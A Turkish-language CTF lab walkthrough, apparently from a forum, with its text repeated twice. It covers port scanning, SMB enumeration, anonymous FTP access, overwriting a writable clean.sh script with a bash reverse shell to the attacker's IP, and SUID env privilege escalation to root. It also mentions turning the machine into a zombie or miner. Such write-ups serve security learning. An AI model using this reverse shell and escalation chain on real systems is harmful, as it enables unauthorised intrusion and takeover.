Soru 1
Kaç tane portun açık olduğunu bulmamız için nmap tarzı otomatize edilmiş bir toola ihtiyacımız var. Olmasada olur ama işimizi sadece burada değil scriptleri sayesinde istihbarat toplamada da görecektir. Alışkanlık olduğu için buradan devam ediyorum...
Burada çıkan port sayısını yazıp sonraki soruya geçelim.
Soru 2
21. Portta hangi servisin çalışan servisi soruyor. Genellikle bu portta FTP servisi çalışıyor. Zaten NMap taramamızda hangi servisin çalıştığını bulmuştuk.
Soru 3
139 ve 445 portlarında hangi servisin çalıştığı yazıyor. Burada da taramamızda samba smbd çıktığını görmüştük. Yani çalışan servis SMB
Soru 4
Şimdi sisteme girmek için klasik olan ftp portunu kullanacağız. Aslında bunu kullanmamızın ana nedenlerinden birisi backdoor oluşturmaktır. Böylece yetki yükseltme saldırılarıyla sistemde root olup istenilen dosyalara erişebilir belki de sistemi zombi ve ya miner a çevirebiliriz
)
İlk olarak hangi dosya çağırılımış onu kontrol edelim. Bunun için smbmap ve ya enum4linux u kullanabiliriz. ben smbmap i kullanacağım.
Soru 5
Burada 2 soru var. İkisi de benzer olduğu için aynı başlık altına aldım.
şimdi daha önceden bağlanmaya çalıştığımız ftp portuna tekrar bağlanmaya çalışalım. Neredeyse her ctf de olan "anonymous" login ile giriş yapalım.
Daha sonra clen.sh dosyamızı kendimize çekelim.
Eğer ftp ye bağlanmadan önce hangi klasördeyseniz oraya inecektir. Mesela Masaüstü klasöründeysek masaüstüne inecektir.
İndirdiğimiz clean.sh dosyasını vs code ile ve ya gedit vs. ile açalım.
Bunu python vs. ile de yapabilirsiniz ama racona uygun olsun o yüzden linux shell ile yapalım. Bir nevi .bat dosyasının linux hali.
Şimdi kendi düzenlediğimiz clean.sh dosyasını
Bunları yaptıktan sonra bağlantımız terminalimize gelecektir.
"LS" ile nerede olduğumuzu kontrol edelim. AA orada ne var? Evet sorudaki dosya . "cat users.txt" ile içini açıp cevabı yazabiliriz
Fakat root olmak ve root.txt dosyasını okuyabilmemiz için root olmamız gerek.
Kaç tane portun açık olduğunu bulmamız için nmap tarzı otomatize edilmiş bir toola ihtiyacımız var. Olmasada olur ama işimizi sadece burada değil scriptleri sayesinde istihbarat toplamada da görecektir. Alışkanlık olduğu için buradan devam ediyorum...
Kod:
nmap -sV -T4 -A -Pn(bu ctf için opsiyonel) +makine ip+Burada çıkan port sayısını yazıp sonraki soruya geçelim.
Soru 2
21. Portta hangi servisin çalışan servisi soruyor. Genellikle bu portta FTP servisi çalışıyor. Zaten NMap taramamızda hangi servisin çalıştığını bulmuştuk.
Soru 3
139 ve 445 portlarında hangi servisin çalıştığı yazıyor. Burada da taramamızda samba smbd çıktığını görmüştük. Yani çalışan servis SMB
Soru 4
Şimdi sisteme girmek için klasik olan ftp portunu kullanacağız. Aslında bunu kullanmamızın ana nedenlerinden birisi backdoor oluşturmaktır. Böylece yetki yükseltme saldırılarıyla sistemde root olup istenilen dosyalara erişebilir belki de sistemi zombi ve ya miner a çevirebiliriz
)İlk olarak hangi dosya çağırılımış onu kontrol edelim. Bunun için smbmap ve ya enum4linux u kullanabiliriz. ben smbmap i kullanacağım.
Kod:
smbmap -H +makine ip+Soru 5
Burada 2 soru var. İkisi de benzer olduğu için aynı başlık altına aldım.
şimdi daha önceden bağlanmaya çalıştığımız ftp portuna tekrar bağlanmaya çalışalım. Neredeyse her ctf de olan "anonymous" login ile giriş yapalım.
Daha sonra clen.sh dosyamızı kendimize çekelim.
Kod:
get clean.shEğer ftp ye bağlanmadan önce hangi klasördeyseniz oraya inecektir. Mesela Masaüstü klasöründeysek masaüstüne inecektir.
İndirdiğimiz clean.sh dosyasını vs code ile ve ya gedit vs. ile açalım.
Kod:
bash -i >& /dev/tcp/+ipniz+/1234 0>&1Bunu python vs. ile de yapabilirsiniz ama racona uygun olsun o yüzden linux shell ile yapalım. Bir nevi .bat dosyasının linux hali.
Şimdi kendi düzenlediğimiz clean.sh dosyasını
Kod:
put clean.sh[/B][/CENTER]
[B][CENTER]
nc 1234 -lvp (yeni terminalde)Bunları yaptıktan sonra bağlantımız terminalimize gelecektir.
"LS" ile nerede olduğumuzu kontrol edelim. AA orada ne var? Evet sorudaki dosya . "cat users.txt" ile içini açıp cevabı yazabiliriz
Fakat root olmak ve root.txt dosyasını okuyabilmemiz için root olmamız gerek.
Kod:
find / -perm -4000 2>/dev/null/bin/env klasörü dikkatimizi çekiyor ve SUID buradaki linke gidip nasıl yetki yükselteceğimize bakalım.
Sanırım aradığımızı bulduk..
Kod:
./env /bin/sh -pEvet birşeyler oldu "whomai" yazarak kontrol edelim. Ve evet root olduk. Şimdi "LS" yaparak kontrol edelim. Karşınıza "root.txt" çıkacak. Ve bu da CTF 'imizin son sorusuydu.
